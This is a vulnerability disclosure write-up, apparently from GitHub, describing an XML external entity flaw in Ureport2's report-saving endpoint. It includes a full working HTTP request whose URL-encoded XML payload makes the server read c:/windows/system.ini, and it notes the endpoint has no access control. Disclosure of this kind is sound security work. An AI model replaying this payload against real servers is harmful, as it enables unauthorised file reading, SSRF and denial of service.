Skip to content
Permalink
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time

Ureport2 XXE Author:idam0n

The interface for saving reports does not disable external entity parsing when parsing xml data, resulting in the possibility of submitting malicious data for injection of xml external entities, reading arbitrary files in the operating system, and causing ssrf to detect intranet information by writing a large number of cyclically called entities Carry out dos attacks, etc.

The vulnerable code at file:ureport2-core-2.2.9.jar method:com.bstek.ureport.parser.ReportParser.parse as the picture: image

It is found that the program directly reads the xml information, and it is not configured to prohibit external entity references, resulting in xxe

Reproduce the local build environment: Use idea to build a Springboot demo project and introduce ureport2:

image

Exploiting the Vulnerability

save a report image

the http message: image

now add the xxe payload to post program 'content' the xml content with payload: image

submit data,the http message: image

POST /ureport/designer/saveReportFile HTTP/1.1 Host: 192.168.66.39:8881 Content-Length: 3936 Accept: / Origin: http://192.168.66.39:8881 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Referer: http://192.168.66.39:8881/ureport/designer Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: JSESSIONID=F988AAC7F0ED6210948EE2DB114A8A86 Connection: close

file=file%3Atets1.ureport.xml&content=%3C%3Fxml+version%3D%221.0%22+encoding%3D%22UTF-8%22%3F%3E%3C!DOCTYPE+x+%5B+%3C!ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fsystem.ini%22%3E%5D%3E%3Cureport%3E%3Ccell+expand%3D%22None%22+name%3D%22A1%22+row%3D%221%22+col%3D%221%22%3E%3Ccell-style+font-size%3D%2210%22+align%3D%22center%22+valign%3D%22middle%22%3E%3C%2Fcell-style%3E%3Csimple-value%3E%3C!%5BCDATA%5B%5D%5D%3E%3C%2Fsimple-value%3E%3C%2Fcell%3E%3Ccell+expand%3D%22None%22+name%3D%22B1%22+row%3D%221%22+col%3D%222%22%3E%3Ccell-style+font-size%3D%2210%22+align%3D%22center%22+valign%3D%22middle%22%3E%3C%2Fcell-style%3E%3Csimple-value%3E%3C!%5BCDATA%5B%5D%5D%3E%3C%2Fsimple-value%3E%3C%2Fcell%3E%3Ccell+expand%3D%22None%22+name%3D%22C1%22+row%3D%221%22+col%3D%223%22%3E%3Ccell-style+font-size%3D%2210%22+align%3D%22center%22+valign%3D%22middle%22%3E%3C%2Fcell-style%3E%3Csimple-value%3E%3C!%5BCDATA%5B%5D%5D%3E%3C%2Fsimple-value%3E%3C%2Fcell%3E%3Ccell+expand%3D%22None%22+name%3D%22D1%22+row%3D%221%22+col%3D%224%22%3E%3Ccell-style+font-size%3D%2210%22+align%3D%22center%22+valign%3D%22middle%22%3E%3C%2Fcell-style%3E%3Csimple-value%3E%3C!%5BCDATA%5B%5D%5D%3E%3C%2Fsimple-value%3E%3C%2Fcell%3E%3Ccell+expand%3D%22None%22+name%3D%22A2%22+row%3D%222%22+col%3D%221%22%3E%3Ccell-style+font-size%3D%2210%22+align%3D%22center%22+valign%3D%22middle%22%3E%3C%2Fcell-style%3E%3Csimple-value%3E%3C!%5BCDATA%5B%5D%5D%3E%3C%2Fsimple-value%3E%3C%2Fcell%3E%3Ccell+expand%3D%22None%22+name%3D%22B2%22+row%3D%222%22+col%3D%222%22%3E%3Ccell-style+font-size%3D%2210%22+align%3D%22center%22+valign%3D%22middle%22%3E%3C%2Fcell-style%3E%3Csimple-value%3E%3C!%5BCDATA%5B%5D%5D%3E%3C%2Fsimple-value%3E%3C%2Fcell%3E%3Ccell+expand%3D%22None%22+name%3D%22C2%22+row%3D%222%22+col%3D%223%22%3E%3Ccell-style+font-size%3D%2210%22+align%3D%22center%22+valign%3D%22middle%22%3E%3C%2Fcell-style%3E%3Csimple-value%3E%3C!%5BCDATA%5B%5D%5D%3E%3C%2Fsimple-value%3E%3C%2Fcell%3E%3Ccell+expand%3D%22None%22+name%3D%22D2%22+row%3D%222%22+col%3D%224%22%3E%3Ccell-style+font-size%3D%2210%22+align%3D%22center%22+valign%3D%22middle%22%3E%3C%2Fcell-style%3E%3Csimple-value%3E%3C!%5BCDATA%5B%5D%5D%3E%3C%2Fsimple-value%3E%3C%2Fcell%3E%3Ccell+expand%3D%22None%22+name%3D%22A3%22+row%3D%223%22+col%3D%221%22%3E%3Ccell-style+font-size%3D%2210%22+align%3D%22center%22+valign%3D%22middle%22%3E%3C%2Fcell-style%3E%3Csimple-value%3E%3C!%5BCDATA%5B%5D%5D%3E%3C%2Fsimple-value%3E%3C%2Fcell%3E%3Ccell+expand%3D%22None%22+name%3D%22B3%22+row%3D%223%22+col%3D%222%22%3E%3Ccell-style+font-size%3D%2210%22+align%3D%22center%22+valign%3D%22middle%22%3E%3C%2Fcell-style%3E%3Csimple-value%3E%3C!%5BCDATA%5B%5D%5D%3E%3C%2Fsimple-value%3E%3C%2Fcell%3E%3Ccell+expand%3D%22None%22+name%3D%22C3%22+row%3D%223%22+col%3D%223%22%3E%3Ccell-style+font-size%3D%2210%22+align%3D%22center%22+valign%3D%22middle%22%3E%3C%2Fcell-style%3E%3Csimple-value%3E%3C!%5BCDATA%5B%5D%5D%3E%3C%2Fsimple-value%3E%3C%2Fcell%3E%3Ccell+expand%3D%22None%22+name%3D%22D3%22+row%3D%223%22+col%3D%224%22%3E%3Ccell-style+font-size%3D%2210%22+align%3D%22center%22+valign%3D%22middle%22%3E%3C%2Fcell-style%3E%3Csimple-value%3E%26xxe%3B%3C%2Fsimple-value%3E%3C%2Fcell%3E%3Crow+row-number%3D%221%22+height%3D%2218%22%2F%3E%3Crow+row-number%3D%222%22+height%3D%2218%22%2F%3E%3Crow+row-number%3D%223%22+height%3D%2218%22%2F%3E%3Ccolumn+col-number%3D%221%22+width%3D%2280%22%2F%3E%3Ccolumn+col-number%3D%222%22+width%3D%2280%22%2F%3E%3Ccolumn+col-number%3D%223%22+width%3D%2280%22%2F%3E%3Ccolumn+col-number%3D%224%22+width%3D%2280%22%2F%3E%3Cpaper+type%3D%22A4%22+left-margin%3D%2290%22+right-margin%3D%2290%22%0A++++top-margin%3D%2272%22+bottom-margin%3D%2272%22+paging-mode%3D%22fitpage%22+fixrows%3D%220%22%0A++++width%3D%22595%22+height%3D%22842%22+orientation%3D%22portrait%22+html-report-align%3D%22left%22+bg-image%3D%22%22+html-interval-refresh-value%3D%220%22+column-enabled%3D%22false%22%3E%3C%2Fpaper%3E%3C%2Fureport%3E

now open the report we can get the file content at c:/windows/system.ini image

It should also be noted that,the function has no access control so it can be accessed by any user.

And for more, An XML External Entity (XXE) can also cause ssrf and dos ssrf: image